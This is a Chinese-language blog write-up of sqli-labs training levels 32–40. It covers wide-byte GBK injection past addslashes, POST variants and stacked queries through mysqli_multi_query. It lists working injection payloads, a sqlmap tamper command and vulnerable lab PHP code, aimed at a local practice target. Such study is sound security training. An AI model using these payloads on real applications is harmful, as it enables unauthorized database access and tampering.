hu1y40's blog

hu1y40'blog
天堂的穹空遍布地狱之火的颜色,但也是天堂。
  1. 首页
  2. 靶场
  3. sqli-labs
  4. 正文

sqli-labs 31-40

2023年10月7日 602点热度 0人点赞 0条评论

32

步骤

手动

宽字节注入原理:php中编码为gbk,函数执行添加的是ascii编码,当mysql使用gbk的时候,%df会与\组成%df%5c为一个宽字符。

fig:

payload:?id=0%df%27%20union%20select%201,2,3--+

sqlmap

python sqlmap.py -r temp.txt --tamper unmagicquotes.py --batch --dbms mysql

33

同32,看源码32是自己编写addslash函数,33是php自带的addslashes()

34

步骤

手动

改成post即可

fig:

payload:uname=admin%df' union select version(),database()--+&passwd=admin&submit=Submit

35

步骤

手动

fig:

payload:?id=-1%20union%20select%201,2,3

36

同32

过滤函数:

function check_quotes($string)
{
$string= mysql_real_escape_string($string);
return $string;
}

37

36改成post

38

步骤

手动

if (mysqli_multi_query($con1, $sql))
{

/* store first result set */
if ($result = mysqli_store_result($con1))
{
if($row = mysqli_fetch_row($result))
{
echo '<font size = "5" color= "#00FF00">';
printf("Your Username is : %s", $row[1]);
echo "<br>";
printf("Your Password is : %s", $row[2]);
echo "<br>";
echo "</font>";
}
// mysqli_free_result($result);
}
/* print divider */
if (mysqli_more_results($con1))
{
//printf("-----------------\n");
}
//while (mysqli_next_result($con1));
}
else
{
echo '<font size="5" color= "#FFFF00">';
print_r(mysqli_error($con1));
echo "</font>";
}
/* close connection */
mysqli_close($con1);

mysqli_multi_query() 函数执行一个或多个针对数据库的查询。多个查询用分号进行分隔。

fig:

payload:?id=1%27;%20create%20table%20test38%20like%20users;%20--+

39

同上数字型注入

40

payload:http://localhost/Less-40/?id=1%27);create%20table%20test40%20like%20users;--+

标签: 合集 漏洞
最后更新:2023年10月7日

hu1y40

这个人很懒,什么都没留下

点赞
< 上一篇
下一篇 >

文章评论

razz evil exclaim smile redface biggrin eek confused idea lol mad twisted rolleyes wink cool arrow neutral cry mrgreen drooling persevering
取消回复
文章目录
  • 32
    • 步骤
      • 手动
      • sqlmap
  • 33
  • 34
    • 步骤
      • 手动
  • 35
    • 步骤
      • 手动
  • 36
  • 37
  • 38
    • 步骤
      • 手动
  • 39
  • 40

分类目录

  • 0day安全
  • Bypass
  • C++Prime
  • CTF
  • DoS
  • DoS
  • FUZZ
  • iot
  • JSONP
  • MISC
  • MISC
  • PHP伪协议
  • Python
  • REVERSE
  • sqli-labs
  • SQL注入
  • Trick
  • UAF
  • WEB
  • WEB
  • XXE
  • 书籍阅读
  • 二进制
  • 代码阅读
  • 信息搜集
  • 信息泄露
  • 加密与解密
  • 双重释放漏洞
  • 反序列化
  • 命令执行
  • 命令执行
  • 堆溢出
  • 密码学
  • 弱加密
  • 提权漏洞
  • 整数溢出
  • 文件上传
  • 未分类
  • 栈溢出
  • 格式化字符串漏洞
  • 模型
  • 汇编语言
  • 渗透测试
  • 漏洞分析
  • 漏洞利用
  • 漏洞战争
  • 漏洞挖掘
  • 病毒分析
  • 越界读取
  • 路径遍历
  • 逻辑漏洞
  • 配置不当
  • 钓鱼
  • 靶场
最新 热点 随机
最新 热点 随机
加密算法 2023年度总结 RTSPServer StackOverflow Vulnerability FUZZ 总览篇 MP4Box 无限循环漏洞 CVE-2023-40477 Winrar RCE漏洞分析
CVE-2023-32784 KeePass主密码泄露漏洞分析 原码与反码与补码 sqli-labs 31-40 文件上传靶场pass-11-20 Git使用及ctf实战 Fuzzing101 8

COPYRIGHT © 2023 hu1y40's blog. ALL RIGHTS RESERVED.

Theme Kratos Made By Seaton Jiang

鄂ICP备2021009673号-1